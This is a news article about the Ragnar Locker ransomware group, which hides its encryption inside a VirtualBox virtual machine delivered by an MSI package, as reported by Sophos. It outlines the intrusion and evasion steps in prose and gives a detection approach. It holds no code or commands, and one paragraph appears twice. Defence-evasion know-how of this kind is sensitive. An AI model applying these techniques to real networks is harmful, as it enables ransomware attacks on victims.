Ragnar Locker Ransomware Attack Hides Inside Virtual Machine
The UK-based cybersecurity firm Sophos first spotted this new technique and it shows just how far cybercriminals are willing to go to ensure that their ransomware attacks are not detected by a victim’s antivirus or other security software. The tactic “lends itself very well to ransomware because it wants to encrypt files, and attackers would want that to be done by a trusted application,” said Mark Loman, director of engineering, threat mitigation, at Sophos, in an interview with SC Media.
In order to avoid detection by antivirus software, the operators of the Ragnar Locker ransomware have begun installing Oracle’s VirtualBox and running virtual machines on the computers they infect before deploying their ransomware.
In a blog post on the topic, Loman explains that a ransomware attack leveraging a VM environment “takes defense evasion to a new level.” That’s because while the malicious code is able to attack the disks and drives of an infected host, the security software installed on said host cannot reach the malware. “Defenders only have a view of the physical machine, not of the virtual machine,” Loman further explained in his interview.
According to Sophos, the group behind RagnarLocker has been known to steal data from targeted networks before launching a ransomware attack in order to encourage victims to pay. Last month, they attacked the network of Energias de Portugal (EDP), claimed to have stolen 10TB of sensitive company data and demanded a ransom of $11m while threatening to release the data if the ransom was not paid.
In past attacks, the RagnarLocker group has used exploits of managed service providers (MSPs) or attacks on Windows Remote Desktop Protocol (RDP) connections to establish a foothold on targeted networks. After gaining admin-level access, the group uses native Windows administrative tools such as Power-shell and Windows Group Policy Objects (GPOs) to move laterally across a network to launch attacks on other Windows clients and servers.
In past attacks, the Ragnar Locker group has used exploits of managed service providers or attacks on Windows Remote Desktop Protocol (RDP) connections to gain a foothold on targeted networks. After gaining administrator-level access to the domain of a target and exfiltration of data, they have used native Windows administrative tools such as Powershell and Windows Group Policy Objects (GPOs) to move laterally across the network to Windows clients and servers.
In the detected attack, the Ragnar Locker actors used a GPO task to execute Microsoft Installer (msiexec.exe), passing parameters to download and silently install a 122 MB crafted, unsigned MSI package from a remote web server. The primary contents of the MSI package were:
- A working installation of an old Oracle VirtualBox hypervisor—actually, Sun xVM VirtualBox version 3.0.4 from August 5, 2009 (Oracle bought Sun Microsystems in 2010).
- A virtual disk image file (VDI) named micro.vdi— an image of a stripped-down version of the Windows XP SP3 operating system, called MicroXP v0.82. The image includes the 49 kB Ragnar Locker ransomware executable.
The virtualization software and the virtual disk image are copied to the folder C:\Program Files (x86)\VirtualAppliances.
The virtual machines are then booted up running a stripped-down version of Windows XP SP3 called MicroXP v0.82. The attackers then run their ransomware inside of the virtual machine and this makes it impossible for antivirus software to detect.
Instead of seeing an unknown program making changes to files stored on a device and in shared drives, to the antivirus software all of these changes appear to have originated from the legitimate VirtualBox app so users are not notified. Sophos says that this is the first time it has seen a ransomware group abuse virtual machines during an attack but now that cybercriminals know this new technique works, expect to see others try to implement it in the future.
With the ransomware operating inside the virtualized environment, “its process and behaviors can run unhindered, because they’re out of reach for security software on the physical host machine,” the blog post states.
Fortunately, Loman told SC Media, such attacks can be detected before the damage is done. He explained that “endpoint protection with a zero-trust model against ransomware can still monitor the well-known hypervisor process that runs the virtual machine. By keeping a close eye on every file that the hypervisor touches in the physical world, it can detect if a document or image becomes malformed by encryption.”